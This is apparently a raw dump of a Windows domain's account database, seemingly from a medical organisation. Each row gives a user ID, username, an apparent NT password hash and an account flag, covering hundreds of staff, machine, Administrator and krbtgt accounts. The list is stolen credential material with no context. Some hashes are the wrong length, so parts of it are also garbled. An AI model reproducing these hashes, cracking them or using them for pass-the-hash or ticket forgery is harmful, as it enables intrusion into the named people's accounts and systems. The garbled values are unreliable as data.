1679 osmotkfp 50c877f12bb3ab3a1ae0c90967f4e97 512
1836 staceyswiontek ddd1940715650b21ad48c5ba67adcc38 512
1987 akuhn fc88bee9b0c17ca524adb09ecc8b805d 66080
1955 awohlenhau a75fae5b4c80180977b062a2b01f1187 512
1534 baagard 0290400c405abaf5a5f6c862ce7ba8ee 512
1124 NWKS4$ 002d632e95effc6793cba7fe5dc65093 4096
1578 kklabo 715b5362db34d6acd654e0a1763483f9 66080
1577 klringdahl bf8e69157a193c800a66b83c8a9df864 66080
1364 NWKS11$ c0ecff2a6454d92cd29619414c879ffc 4096
1362 NWKS9$ 7c148e919425e07f48df098d481d91eb 4096
1123 NWKS3$ 7ebe7393bbd374e6161fcae2129aa660 4096
1130 NWKS10$ f245c27b080ceef5f43f5202aa80e5de 4096
1382 NWKS12$ 366eaea8e999f9b72c7d40ee8819ed2a 4096
1128 NWKS8$ c8d0b8661825257099bbea223526b4a7fa 4096
1156 t2 00e05128adfc76f8abd66588f9a5acf7 512
1111 backup 6817c701afdb1af1fba708761c2fc56d 66048
1154 test3 5af3584b3dc373f54f88c04f9bafc4a3 66082
1133 demo a80fdb8db842a99d87ef3d857f8ddcf1 514
1429 trthormodson 55a87b3f01b7be6d6fdd2e8adfd5f7dd 512
1127 NWKS7$ 25051c3d18bb3cd72a2eac82e43ce515 4096
1126 NWKS6$ 540b1aea40c7862d081dfdd9191dab69 4096
1125 NWKS5$ 02552a5f4bc62a86aef7991040415156 4096
1242 drkim 4a89fabed90f8bdaad4c3b5f9849d0da 66048
1116 NSTORE0$ 2fee332c247d4950ee9a515b30cf1332 4096
3605 dummy d1856f76c1ad69d2f9fd1cb4d184cadb 66080
1285 juliedevries 3286bbe80dd8a5adb29271452d3a25 512
1727 j_herzrc 71b43a8306d1bb60e84a0bc2400a5a21 512
1529 dmarsolek 0d9abd5da9c1866c5bd831210a492743 512
1114 NODE1$ edae82eb008b0370092cf194246b2208 4096
1115 NODE0$ 0b0c7cac3d4a70b8a757bc22671deb8a 4096
1271 cfvorland e8254befc20061f88fa9f42a41e0c8dd 66048
1604 NSERV3$ 1b98c8261bc0b0e672d00be49f42848b 4096
1546 oaajayi 17ff2378c1e12cbfe599b888c1150ff7 66080
1775 machelleellingson e4f089a7c304f1dc1b780153ecd3f364 512
1483 gschwartz 9ce58ad20c46478fce080e997bb33d94 512
2021 nlnordwick ee4ea2f8de1cf636ccb2be6dad783ddc 66080
1544 smitzen e51624612bf604843c28b87c28d92cd1 66080
1305 sarahthormodson a39cda5325b0e788aa11340313ea0345 512
1443 crcolosky edebf24db8fd09f1a0f968a391cef2fc 66080
1812 ptmgr 760914937703f202577c78f561733b31 512
1975 kakragness 56e541a171ba2657f59d037c1eca01a0 66080
1973 loriv 4c3f522e7795bf6057839202b9217aab 66080
1939 sbt ce19b3c08eefb3c70f7ff8d635bca0ee 66080
1816 raisnf ef41696712216e5d6b18f34591f7e3ed 512
1967 drsullivan 28a07a24ca69c3096c371f83ed2fd6bb 514
3611 jmvodvarka 0988517aa5c0d23287f5531bd767bdd3 66080
3612 rdleach 305748acc942ce51ea160ffbda2559ea 66080
2017 jharren 73e28a16319bce0a219a862c9f204430 512
1500 skchristenson 54b9fc57d368b8ff2a7101acbbbe44fa 66080
1131 NSERV2$ d761fd6b7f26488f9698d91b7eaf1e1e 4096
1919 dlsellgren b6a7b4ccc18e78e895fdbc2a347d6798 66080
2015 ionyeka af4f10cee095a721eb8cb3f036df1c70 66048
1738 drwinans 71b43a8306d1bb60e84a0bc2400a5a21 512
1554 jmayer 787289804393737481268248227c117827 66048
1722 trheeter 0b05de3837e6ba3ce07be5fce98c6322 512
3107 almoe a87b3d76707861af97c27a27187819dc 544
1538 daseiple 4e74436540e598306b5b2ba9c16e9620 512
1513 mlwallsu 160a1427d98056bf150dfaf2fe48777a 512
1667 jagreesu e7cb8d48488e91ea0dd4548f574d6659 512
1761 jagreen eeda0eb9b71e405585858da0d7642ab781 512
2046 rmjohnson 289c0c451964e336712485cf8dbe4755 66080
1545 tmsevernak dcf92958c0599f683d18a8701d6efbd9 66080
2037 bellerbusch 1ce00366e6098db49075cab81822db56 66080
2008 fkness 5f43280579e5f5062ffb466c323b79cf 66080
1454 eaberge a25c8562b46b3d0c1533faac1dcde5ef 512
2050 nnwelle ab8daa583f3d0b371e69a77e6f572bce 66080
1459 bmharrington 854433a874acdb34b89038360951ce 512
3613 mmmorrissette ad7735963a7ca199196f8dc3a0cad73d 544
1882 jdmeyer 6c2f21eaeeffc12bac28d943d81901f6 512
1284 joanneness 0c49e463779481ef48b1f1feb997bf1813 512
3608 bhebel 2bdcad6d2082323222a291328ab4883e 544
2053 sselander 729e9ece532d9019bd9038ce881261d4 544
1291 lorikress 189991f5fe87e3a5a7e9e48d02d02ed8 512
1253 jlgaddie 347d96e999a64676c9867077c3def848 512
3111 sevans bccc9db3f8487cf2d7a5841b947e5352 544
1203 drasp 1281fdd45fab83c83c14909815968d7fde3 512
1734 bjneulrc d7a898205589c97a081ecfe4e1d03dac 512
1197 lbdrewsu 95c852590a06992b56dc18c19d8f7ff2 512
3619 amschuler 66c2ea682add1cedad28a54d2abe1e29 66080
1270 cherylbarry a9936d9ada4e566970ffab18ad878360 512
1381 pstoy 4f0a88bd21612aab75bbaa60de5a0ed3 512
1348 annvipond aa6a9b32f4966bd433a43775da85a4ef 512
2025 ajberger 8589f311be9a89f3f5cb9f25b7331786 66080
1264 amysund e81b0a2dd62794e47449df0069578e0a 512
2054 ahovet 71b43a8306d1bb60e84a0bc2400a5a21 544
1749 bramunds 08f433ddf0fc1ca21774d06679edf8bb 512
3609 mmorseorse 92ea6607ee7c2e6d531767525ab897d4 544
1672 mjdethed 39ea5315b341f934298362c6d4a91c66 512
1762 d_buskor 3bc79616b3e5f0ff07e9cb3b1c15c681 512
1535 nreger a9c4f9d0547a927b2a3218803c8d7294 514
2013 speterson318 753e158458814722e2a683c683d5c8e97 66080
3117 snhoeper 0ad907fdfa4b6b97feb2958184664c5c 66080
1751 kageormu d1394916f03c58c542c1bd959d4f887b 512
1879 drhone 47e51872dc078c8816c4444e09cdc47c 514
3120 lamartinez f8661751b21896715d42b388a201e403 66080
2056 klvaughn 270ad290a806a2a58bb980f8fcaf6f72 66080
1555 jturk 07dcecd4742430e0327a34353df4e5fb 512
3113 hmckay 35e649e3253284b7cfdb7797ae18bc73 544
1932 ecokundaye 5cd2316d2043cbbe21c042ccb0062669 512
1560 mvagts f3b3687841a863b9756718138a65e0f9 66048
1559 jtovson f2d2c21e5cc948ad54cdc241cae398ab 512
2011 skhan 3c850a53e8f962d6d2db12ddafe2b38d 66080
3623 habjerke 7e8c84c917c9fc038963a3ce93216e85 66080
3624 nmburrows 53e1a7c692df47380ac6b10fa929d619 66080
3116 lbade a42517c0b074323ed7551e7843e06a6a 66080
3622 rasamaraweera 53598c7cef57dbbe022cd6c3a060dd62 66080
3618 cknapp 8d44d9d97a7eb51453c9675c27f77d58 66080
2057 amueller 1715ffc1cc289374eac3d026d2212729 544
2055 kherness ee1357a73b9570c7417e92a6c42108b2 66080
1865 jsanders 7bbe92186dfa6d83ff80f86ea5432bae 512
1854 drbrett e61249c7e0f735af6455250d047454be 66048
1765 drgallagher 39a6ccd7d6d2babdd11650ca3e4f2e7f 512
3125 sreilly 23ae101070bc0586361647a114e924f4 544
2020 teevenson 21cd92559f2f6777c392238631bfa2da 66080
3626 svaishvav 55d497470255d27142997ea1a14440 66080
3627 cwwieland ae28fff64a4fe592611d190f19102983 66080
3625 lweyer e3e7eee1ed76769a23f471ac120c1e06 544
3124 nakunz 9dbc36a0c8329bd74432d16fc2c6bb6e 66080
3129 kbbitz 97e8e354617e6ee997afc476e63414a8 66080
3127 djepson b678ccaaaf35cbc0abfca452ad58a228 544
3131 bjvermeer 4c62227a61ee486a68c7a9669dde29c0 66080
1921 emseverson 4f44dedf2fde9618daac909e19bf86e0 66080
1349 gpnordahl 2fd4028cbf019e74c73561a8b38842a9 66048
1657 jlhoxibi 0d83157bb7516b53caefc4ddb26cb3a8 512
1837 jattarian c351b623e6b9a8644df6e0306668be3a 66048
1226 drpettit abc9339628f25497f82bff321aef2adf 512
1424 drlazzara 621cbce749b9e2d0d3932c569570af16 66048
1354 mhstrosu f101a562f2474a7ebf2c882996f78dfe 512
1414 mmalterud 252f40027953f53db8d5355fc4e623f3 512
3134 drsmith f53cbf927e94b3299e739c5bd5a68a82 66080
1383 drgundersen 6507e1a9ce1074d7033ace38472930d6 512
1431 rakhan a071fbf41deb4a041253d28e8349e11a 512
1255 mjblank 3a9be57e8803c1d632a52665e8886922 66048
2063 Dmsoderberg 1e27ea1d77323210ba372ef48bc2435b16 66080
1371 lindaanderson 99bc030173d93dd089f0fb00f663a592 512
1936 kdkaste 979cf8e3376ea416e5e9e247441f145b 512
2007 emurunga 68859a1fae623d63c1afb7f4722ef25e 66080
1367 drmcdonald f0e5ca8c0726e882a6d08ee2fecf6010 512
1494 bimanoel 53ced4ca69f53350ac0a242037b42d3c 512
2062 mlmcclure c724392f7594a12f52a3e2ae3f09ed93 66080
2059 sotto 556c52008436c466b802843877ce5b77 544
1895 lwatkins 335c8f6f374ddbb6942e65e09dbfba17 512
1464 stesfamariam c8ba09ade5d018958a24e66aab7eb381 512
3615 sdhansen 3be1b8bc507e147aec8fa1c8c3255ad1 66080
3133 ebibich b418813395857c8dd626946ca72aa6d 544
2060 cschroeder 848c5db736f59224b6521f83de457008 544
1316 njohnson 71b43a8306d1bb60e84a0bc2400a5a21 512
3126 krwannemacher 02ef3299dba8d6b10273d2ec377c451e 66080
2051 lemolter dc9515868900774b69ae6764f74b03d7 66080
3130 mfradet bfec4f416bd9c687473afb442cc89786 544
2066 amusolino 564591a18751d61a058a8e12a9ea2b3b 66080
3140 agqazi 37c1acdf538c07ebbebadb2e013b65e1 66080
1254 jyrkwa c49ad9b094c1e2e9070a48b48b50c40bbca 512
2058 mehouge 21ed21c51ceb7b847881ee01b0f2f0b2 66080
1390 jlnuss d7d4080754aa8e52b97190de07090957 512
3630 hrose 1a7205abe0fafad537d6981673923a5d 544
3128 bgeorge e6cacfc8e3db00201d49bb163118f601 544
3139 cjfisher ede2b6f6f961d6a7a14181af90e0391e 544
2073 blsolheim 5d20da4120415a68bc3ffbe1f00551f4 66080
3632 barettig d6a8135ba862cf03dd064ecb505e1c98 66080
3115 sadahlen d79359164379bec437474a4d9d8944a0 66080
2074 drpauley 112602cfb846fe1795c14c68909dc678 66080
1166 pmpetecc 46e0ad709c50659fc59b550ed7f232f4 512
1365 mdmartineau f8ae494e75ede253bcc67de16fa28e03 514
3142 llcodner 50c1106bc8acb197a255aac5e721709c 66080
1541 qualcoord 0354dbb8b376dd32094b1aefd044d37a 512
3108 ztariq 4705d690f3cec55eaf97c339a69e71ad 544
1173 mjweinri 010f4c58fb04b3ef9b0dd6fbeaa9d33d 512
1682 ljoelkmu 3310515e0a269685d1f2c706cb1a84b8 512
2071 mchris c549a587fc362d601d0a52492a4f9ad3 66080
3148 kljohnson 54f315b20794c3d5f3eb65cef37dd955 66080
3150 kjwalters 0bb84c1adf6c83e25de00741092c319d 66080
3151 nsfroslie 7b759a3f19d6ffe661a629155aec8266 66080
3153 rdcampbell 9ddd27701fca52a3ec319fb2a5c34466 66080
2076 aregan c33f96e046365baab7d0a02204d42cbe 544
1491 slmcgaughey 200a4de5f8bd14c46d65bc8ad1c6ca06 66080
3106 pacs 8846f7eaee8fb117ad06bdd830b7586c 66080
1514 lbdraxten 4d91441f69a87232486af44a6b08f253 512
3633 knelson 03d0143159401abee5a528c0dce74768 544
2080 Cayarke a0316a9f9330960ddad527b32f5af0f4 66080
3638 ljniesche a0abcb477aa06118d0ebe413532cec34 66080
3639 tmwatterson 76aa8428553737150243c4c963d569fd19 66080
3637 jmotto 3a3c6bebeeec017dc900caeb7ccbfecdb 66080
2077 svaishnav 55d497470255d2714299777ea1a14440 66080
1293 madillon 1ff36f57aff1d5db8800d2c785a0cae0 66048
1764 vrdillsu fac2ef7f50e774a2e41df12dbc505099 512
3640 dkgrefe c7ed39affecbc90fd91a1abf68edda0b 66080
1686 tlanderson 55150fc03adda47232d11fa83533d995 512
1984 aleimkuhl cbcd954052a0dcd5384e34f3353a99e1 514
3641 jlheuerman 5281ff4763d8fb598c4266868eb8a7ad 66080
2088 cmmartel 5d1bc7b455964b6f5ae4317b6fb3b9f1 66080
3146 wdduphorn c3b2e61a8a7e9328a07c93457f636b0d 66080
1820 nronnrl 19ad78367f61ade03434329df699aafc 66048
1773 tammimark 9938969a3e61da4b7762cb0b28e52eaa 514
2090 lmmilbeck 51aa35e3c69e3af7a8cad0f55e11d8fb 66080
3159 tjstudor ecdc539913db29572a6db500a015789f 66080
1942 nmnelson e63625ad3dbb41c2de8e7f25b5a18d69 512
3155 mzarbok c8e58daf37662e53ad521414519da823 544
1358 hjanderson ba2f17c9a6927eebe340a25d57fc63a8 66048
2048 aghohman 9649dda66c04c694863b38c02a6e3d3f 66080
3158 kmeichten d20236d18fdb68f0bd26824a1d687fbe 66080
2081 jdavis d9c08ff5332e2c79e582e88637cb260b 544
3642 cgordon 51457260c1e3b9e4b265a9201cdfd713 544
1757 kkstensu 0076dcfb228b7cf51861624948f4a2a5 66048
1925 slmontella 339a9f43281e1d64712917d8b34ab34e 66080
3154 skeller 4857e8c54f2cc52b41f268533403988c 544
2092 sburke a3742094f040007d503a077f3b7b18a1 66080
3636 pbaronhabberstad 5b53a73bf553fcf9374db33be0cc7fa 544
3141 vandvik cc5077e4d91fc974fa62d8629e9fba7a 66080
1799 alnelson 7e003487c37a3874283424b645d18668 512
2079 knstorey 1027f9d7f556dab44d720831e603bcd9 66080
2095 plhed 23e1cf54a3a8db2a8669d4e12a0a8241 66080
2094 dlundby 6b2a35a602186a65973c02150fb70bc9 66080
3161 klillquist e910bee2cd95a3cfabe052189783b1d4 544
1702 wynnkjhs aaa952b4f92018f800e5c19aa9255a6f 512
1706 slleroy 3f7684d51be0a9a78cd7e7a36c7e297a 512
1666 j_beyesu b5ef8bc4d492c5e96fd3ac3d538502bf 512
2083 kbressler 6177b8ccd78e74cd0e23f2121a0f95ca 66080
3156 rbeech b2c06077f1866a3ff2f0e30120d194a9 66080
3648 krubink fdf417ac259ab089e4fdb06269ff93ce 544
1277 djmoe d8a0a68924b7b8dad11e0940ee72a147 66048
1980 NWKS14$ ff080dfeb5a55503cd8129caeac080e4 4096
1521 NWKS13$ 8114caf690393938e8beead4db4c7bab96 4096
1420 aedraeger f23c5c919a07dd7cb86a9d9dab192ef9 512
3164 lmkeller b7ed01f474587ed397b553a566e0239b 66080
3165 drtest 787e222e7b428a71b895c3d39f1ca222 66080
3651 eripley 71b43a8306d1bb60e84a0bc2400a5a21 66080
3652 hsolo 71b43a8306d1bb60e840bc2400a5a21 66080
3653 jsparrow 71b43a8306d1bb60e840bc2400a5a21 66080
3654 erdoctor 7c53cfa5ea7d0f9b3b968aa0fb51a3f5 66080
2000 acbabb 64eaf056b0f7c0f0fc6951ce71e6d6c9 66080
1828 sjpeterson 16497f15560fd9fa371c158b47241b66 512
2068 rluong a82f44c197d723aaca24812e8c6625c1 544
2101 testpacs d44c1eeef473921cc43b079f4a3c1412 544
3168 sclaus 64eaf056b0f7c0f0fc6951ce71e6d6c9 66080
3169 bbee 7c53cfa5ea7d0f9b3b968aa0fb51a3f5 66080
1109 aliedit a80fdb8db842a99d87ef3d857f8ddcf1 66048
1159 iccumgr 544e16f0bedca7fe5b2edb739a0f3111 512
1505 erdoctor1 b14459797d622853569db78c33b43474 512
1241 drtdlarson 5202215389406b0eccb2f1f029c57e9c 514
3166 athelen 2df4f3ee1b4faea233b68268ae983329 544
1574 VMUPGRADE$ 86bc8ae462a55843fe67520b11523d58 4096
1553 brhills 53c6e7c8b0150f36b797ad32d62abc28 66080
1661 reinasor ccf69751cc4a4f8e318b0df52947ccc4 512
3656 mbravo a9bcd52c5198a83a66fe224315fc73f 544
3163 aabliese c4fd4d6e475ab961362ce4ee231aca2b 66080
3109 kjstenger 8ec37706d3de0518b3220192dfc58061 66080
1805 jegervpt 701a630ff55b9ca5c8639cfa39020564 512
1324 lindasander e2a2964ed651c0f7ba4ec81dd01e02aa 66048
3650 khowell cf561634a85d8f5597446005fe7fd8d1 66080
1158 m_rittcc 18bf1995a1d949b7ef9741892266efc5 66048
1118 WSERV0$ 9da2e9383bf4520440d92ac54ac8a4d58 4096
1745 lljennbi f6d4b79198861b1be247d463634341c6 512
2042 pjzimmerman 84ce0bce7008f217cd687f3e5126eeeeee 66080
3614 badahlen 75222701b0d398c68117ca403f205478 66080
1174 aanelssu bad82b030b9c4842f80656a128a76b67 512
1758 hmneulsu 78e277034ec4906d2525b079d4c5749e 512
3174 danderso d4e7dcc95e80467c613daa02cd83b446 66080
3664 ewestergard ba4aa5e94885b31904af6af6c1bf4f39b11 544
3173 csylvester 55b7d520ed567ed59988a54f20078de6 66080
1943 lmweiss 706ee8e0530f19256d86b5457ffa93d9 512
3172 nlstrand c4300f168b4a6ba2c638ce330c4b4a0d 66080
1282 jillgeary 2f913a2a114e727390a6aedc67024b8b 512
502 krbtgt 0743a7d1387b8223ea5683c913ff9e33 514
3661 bgesell d18a344ee8d2bd0a7cf2c10b17a1ee02 66080
1889 hmasmus 62dbe4c921ea6d6f5f412b982405a944 66082
1317 kverjlsn ab6bf500d58072acd7d09530dce4f6b 512
1922 degrunewald 5d773ea1aa7e3d4e47fc15750e8084ad 66080
3658 rloepp c88b55448a90898be0d8eaca3e7c9961 544
3666 ceaves 3ea18c0fbd5c65cdc2b3cb180f99aa0d 66080
3177 jlwilcox 633d364df0e81ee7ce9de549fc9b0088 66080
3628 MRNWKS14$ 3e00e4aae6f1cf0133f66a3b70959413 4096
3178 dmbartels 3cd77333d81bd637234a19ac76ad399b 66080
3181 nraman 366b8b4a49c10e7441fc1b241868a2f2 66080
3635 bdelage 2699a0a42951c71f032da1b9e2bfbf05 544
500 Administrator a80fdb8db842a99d87ef3d857f8ddcf1 66048
1523 tbmatheson 1f776ee6e96b208f8925b03cf11994e8 66080
3660 cfricano 6bbcb20afde0d6b67e6761bb9a7e280 66080
1926 drbarker f990ee0e10ca11e126d7e7001181c0dd 66048
1477 levranz 08a4a2727a1ca671c9260c85d6debc46 66050
3674 jhansen da59c62be282a2b3a207d663eaba129d 544
3676 bsundar df4e2753ded8ea9d3982d6b386196c95 66080
3186 slmcdonough 19019865c9627db050d3debc6d068d59 66080
3187 sbkriegler 51a6eff0344e71a73ba0465acba0dc02 66080
1219 drmagnuson 2b89a35ea806d441361b86e8928f0069 66050
1884 drdellison 7b3ed86168a343943a860db9fd43326 514
1617 radmgr c6ff3f57b90e71395cc63de7b5b80086 514
3104 kkkemper bfe2bdf62b5d348db2317060791183ad 66082
1625 dennjxr f5c1703c283b2e86061e499e9add725c 514
1867 kbitzan c9ea8a405ddbf37e55ef0fa1fc5e7062 514
1635 kjjohnxr 50a17b4631d880ab69c0bff939184e1e 514
1643 llsander 71b43a8306d1bb60e84a0bc2400a5a21 514
1396 amvoorhees 71b43a8306d1bb60e84a0bc2400a5a21 514
1447 llmarfell 382caba988ddcb6b0e7d433b44168b60 514
3110 abthompson 752c4e688d32292b2369a20766f97fe9 66082
2049 tjpeters 661245aab3a2da1cffb9296f4c1bb2d1 66082
1648 thomrmxr 22daffebc9951232db7c2255367541f4 514
1243 bmc 51e4a88e2b207731dfde221c1aac6433 66050
1232 drvan 6198afcefcf76d5aa8ed5a0231f7c4c6 66050
1235 krw f53551d10c915a704f27bd094983b4a1 514
1399 rapearce f5fca4da57abb3624aec5ca9711fad2e 514
1869 drpinke 928084d464e8e2b46953a287d34603ce 514
1901 vkapoor f08ad0acd589ac2d8077cc6be3823b55 66082
3655 drtillotson a14701c2fc0c888805c49abedeab76c7 546
1259 cardiology 0909df2be620d82633dbe6df2a14e822 514
1484 drriley efd9ec287d222a56e5c58fbb5e0c00b3 66082
1511 jkkaspari b68960c19bebf90e2519ff493224cb5d 514
1510 dmspierer 4a842475a181664261effe96a0294ffb 66082
3683 lrhtest c0c14d4369392a6c8984e135341a3e35 66048
1340 akdrouillard b999e773055362a90e066168697f34b1 512
3157 emrabie 84ffe7a05489be6b159d1be4f28d8654 66080
3188 testrad01 7a21990fcd3d759941e45c490f143d5f 66080
3136 arwilliams 1c8a15dc2cf39ad724ecffa34c51df22 66080
3189 kccoleman c53f411c5c25205eb6e41cf532f15f3 66080
3192 kmmuckenhirn 08e79d731566b3e02ee6567b67e06bc2 66080
3193 tlheckman b4fef99bb054df27f3155fb289ddbb09 66080
3185 lglidden 1c74a011d13341346553b4cab99c5f4f 66080
3688 tcarpenter 6dfbc391f973e9edae3d284e217ca305 66080
1162 jdfransen ac3b03f29ce9321c5dc6505ecb69de3c 66048
2085 mdborowski 9d5c0d7a29ba9ab4e8f5ea70731742 66080
3690 jtreynolds 740500dd0c0a4113cb30053c083016d0 66080
1322 jmbernsn 82f1948a684b1ca3acf28319c5a8d011 512
3679 kglasgow 990c521adaaa5e4addf2c9a76018315c 544
3691 mhudalla 753e11fb4f4c64d36d3ec29df1c14b33 544
1829 alerickson 6bd1928a5bff3e98e4e5883d182ecfa4 512
3198 sbeving 395aad84da74aa6f8e56c3461b797315 66080
3200 kpeterson b4d06b8670a68c90ad1b704bbd3fa4a6 66080
3203 naolson e9beec3ca6b473c4e656c1ef9c62a18c 66080
3204 jschmidgall 2e00b6ec17a25e579e9d78463d556549 66080
3206 mdanelke 58d267031108d7b9089fb94f236785c8 66080
3207 cblascyk 9c3b90b15f00f481b94aa164729a4d9b 66080
3208 tbengtson 5b91192b86e5e38304e03cc463c2688c 66080
3209 bkipp 2f2b9a59122f528ae9dab4919eef021a 66080
3210 jstock 04a4816d0d9c50ed5d81967e4472b2 66080
2069 ssnordby b87873f5c36e099a1dd70c2997ee7634 66082
3699 nchelliah 99d18a5640490c029a99461967318196 66080
3700 aathey 802b86f643c99aef0d2ffb945005e482 66080
3121 blee e5291f1449f66686a1def83daa759f66 66082
3706 belee 80b039cd64077f54d6a6c87b76e5cf5f 66080
3708 phaberer f9c143be0041861bb993f39f78df0952 66080
3709 jeandrews 47b29e7297e1a2c493882cb5d1acb5a6 66080
3717 cwarde b97536d0b9013d6c80f2e51d85a6a6ab1 66080
3718 mwendt 0c9dc5585aea4f3f673fad73bc01b5c2 66080
3726 sdenardo 7f77eaa05b49ccc5de2152719fa83158 66080
3728 amiller 7af9829b5e7a480432bbff19ba1a8293 66080
3707 tclemensen eebccdc0b2cb0f4f4e7312f577e3e823 66080
3746 khyttsten 7a21990fcd3d759941e45c490f143d5f 544
3749 jlolsen 7a21990fcd3d759941e45c490f143d5f 544
3714 bmoerke 274194e661d6b4a1f3f4b4395f2a8e11 66080
3705 jhotvedt bddfb254e68978d750fb3b11c88980c8 66080
3747 tschmidt 32ed87bdb5fdc5e9cba88547376818d4 544
3745 lguttormson cf773e1bcad4cfdcabbcc2a1773e8dfa 544
1569 lmshol abc4e928d4b6656cdc2f50d7db91658d 66080
1961 menosal 7bed3d262008d701ebdf6f192f4ecb85 512
3211 jzimmerman ab0361df3905918f506e1ef81a676068 66080
3732 enelson fdcb937082862fec68eb27cca0230cae 66080
3743 kquarzenski 368d1f874ec963f51c3f37bd7cb27728 66080
3217 jradermacher 8e25fca7fe670a1ef3f7d33565702c18 66080
3216 jspaeth 30b6725b7f206dfef38afd3b26cde482 66080
3737 rsticha e2d1252eb58c355cb52d4b94a5716122 66080
3731 dweigel 9df1fc4471da9920da645c1e1b0193a3 66080
3742 amanderson 6838329ad037fab10150f471aafa16bb 66080
3729 jbrand bbec3aa8fccb44beb9658bebd230812a 66080
3738 jandrews 7713e54d6149c19e6bf0b863d7a5829a 66080
3736 abalgaard e02141e877cdc6f0a76212d68b7d1185 66080
3741 lbeebout 751d0a42c7bc3e9728c27852fb7574b7 66080
3730 pdale 082c854cedf9d48adefdc6ad9e5e30dd 66080
3733 tdudley 73c7d1001e98494ff50090e420968de9 66080
3734 sfeierabend 0c20349b27b0d1e70091e812ea5d3e78 66080
3740 tkay aa0cbfff234b8868e3d0e8ecaed1fb49 66080
3215 mkunstle 869344f72de1ad848b5981dcb99d19cd 66080
3739 tlindley c13ecf11cdc215c8060aee2dc9daa7b3 66080
2039 mtorres 789c1048398e3c875f62415cbedafc63 544
3194 tstrates 01f6a51f5ea0f3fa147081938fe17abb 66080
3724 jlohse f4f6de46d8493fe763742c4ddcada732 66080
1839 bjonken 1455893cf488171aac6bdf8f38806f02 66048
3662 bbagheri 85d1b9ed688976d60bca02746a0ea24d 66082
3716 hdavids 2f192067980a1fa183a4edbcf7f88109 66080
3720 aseger 050324abfdd09e698f545ef1d7669076 66080
3751 pjdilly 1a8d34d359c633b9d2b54b20c908dcad 66080
1810 marqmlpt 82532f6826ab4683746e6c899f1d2c26 512
1957 cldahle 1b269f78c8f3b1b38ed363de625b4be9 512
3686 aredding 8d7f15bf43c1aeb699020e2ab4f943a8 544
1928 nlbertram 4802cdb907b9b5e97a4dbb4892b80c7b 66080
3748 bmoore 03096f8607f2f99d8e56d9b63965a2cd 544
3750 jmorris 9abbe5859bdea767528b3ee5e2ba3990 544
3704 cbenson 7561c8f4f9d6f6d9a68a1df57f12606c 66080
1167 r_vigecc 836198353f3bd28c37c6b3656af4d287 512
1519 kjandrews 72689568cd6b52990919f71401f9fbfb 512
3703 lhansen f9e37e83b83c47a93c2f09f66408631b 544
1161 a_evavcc 3227e9a3a0e50f03d995e50dbedc77e9 512
3685 bdehaven c242092bfeeb43b08e7225036b9f6795 544
3182 rschulz 017bc067b2691fa3c1186f14f5c544ba 544
3218 nverma 24f6e3c0b4d60f1fb157fbb057ff6478 66080
2045 smsampson 56d5c133f3ba2b2c8b59b87bce21d4ef0 66080
1827 kugllmbi 46eb00e79da62c3d913ac8cabd39633f 512
1755 pahlmebi 59f20522158f90a6507a5a68450bf8d8 512
3682 drbratlien 6af0a5199725de2dda9244426eb13dfd 66080
1811 symenapt 7c2775f5f46ca6772ff6feda5a15c39d 512
3191 jbheckman 34e66be24b6b3e3018ba4e8590e8ed76 66080
1286 karaaxell 0a3c4deb4606ffc73b0f3db36e73d007 512
3678 asoutor 84b5ce26e9c3c758b60b796381e11a0a 544
3673 cclark 45fd4325cf7526f08270d6d95ec745e3 544
3744 kimjohnson 7a21990fcd3d759941e45c490f143d5f 544
3219 kijohnson 4aea5ff9f308db07dbb3e10c8f59c1e3 544
2099 drjelinek 2881d5cf74fc982d10174434c69d37ca 66080
3221 msumner 0a36ea273622bb254eab03ad1d2f0675 66080
3225 mbussa 834a01e171c1511ad46f193792ac5d62 544
2016 llhexum e6de2a3a895e2f8442d9ef41dc06ba43 512
3212 crohloff ea0069dfe9ce92a05b99a3f64914dadc 66080
3702 ajensen 65071e8a9f6cd3d347566a45f246cdb1 66080
3224 kbuczak 58a478135a93ac3bf058a5ea0e8fdb71 544
3687 tnapp 7ded9cf2a15278db249f4dd0c5c5b2cd 66080
2082 dsquires d8d5d149c6286cedaec6e1cb293d375c 66080
1997 kgogbogu aa78fcafaaecbcdb90b208ac4b5faf94 544
3645 bjlaney 84801213b740b81e9ca60a646b1e0a3f 546
1215 dll 013140f7ceff192b451eaed83b7dbfe1 512
2010 rksundby 2f1bc14d3d54d550a2160ea8fc7f363f 66080
1880 ajfalck b309082b1f3269e0cdf56b71b97e6bd5 66080
1315 lolljdsn f9371be7906002d68a9e1c3da64f4ed2 512
1966 elpeterson c6b2f58f726188912e7e4cc95a787a0f 66080
2064 tleliason af61440f9a461322e1c2fc7b5e0c28de 544
3145 ahdominguez 8b14ef8a873276d96a2ac0567d2d6750 66080
3680 hnalbert c27545b18e0f7af45fea11a7d272b472 66080
3135 etberro 4a829a41aab63d94d2f7dd252eafdc90 66080
3147 jcjohnson 792508dbd7d9693b9e7ce078e9c43885 66080
3197 jhaley 6cff63abc2d1668b91019e120d418b87 66080
3764 cdnorris 5600599991d0b24ec550ca51e9ea53a5 66080
1964 djorandi 1df0d388ff98dab288ac33cfc9af3f17 66080
3170 kmsawyer 3b8a64c7b0261cd3d4273a71a04b8a3d 66080
3701 jbrevig 0d867ce7ee97500f4a18088077719be9 544
3770 jgmarshall c71cf281c08ba3a2580bf7892ed8a8fd 66080
3232 mlpaulson c26abdba943fc666da80387bbe304f6d 544
1886 drberger 98447d252cce6109736c24cb8c5b2c04 512
2078 hegewaldl 7a21990fcd3d759941e45c490f143d5f 546
3659 tharrison 988a8fe2ccb22a1484a20b1f962a2486 544
1668 adkamrfp f72e3a858debde72f50f85bee53c1a0a 512
3758 dnriley 3c42e6b35fd0a27bbda711eba4bd5fd7 66080
3684 kkaushik 04592e27471e3e1ff0fa3f383da6dcf4 66080
1217 drlipson 71b43a8306d1bb60e84a0bc2400a5a21 514
3235 lnygard 7a21990fcd3d759941e45c490f143d5f 544
1875 jlthunselle e4c329e69525291304a7d2807c89477b 66080
3233 acfiala ea65fb049f698ca1a2a5d94fd13cfb0b 544
1565 lwwaite bd5c7f1e2e11b4c5993670cde347bf4b 512
1641 pslinder 9348c3642f47ada17dcfdc1d7d8eca88 512
3762 hwilson c923157653b773887144e4cb634e53bd 544
3205 cshipley 1d82cf8e1ad54e24787e12d42b23e4e6 66080
3236 crico c0aa220653ba235f1f0885bf5aeb6fd6 544
3776 LRH000955$ 2aa647c303f84b9487ca74d2aa4d1f83 4096
3761 svanerp d743f0e50d195a3b7f57445da256d44d 544
3237 jbauer eab4556003a83e179a149ce6583e097f 544
1445 saolson a3174064e5df297ceaebaf4682a611ef 512
2089 aesax de353cfaeec8601f83b2d658a0ac8561 66080
3780 Tanderson 1b66337b958db181272b0c28092321c5 544
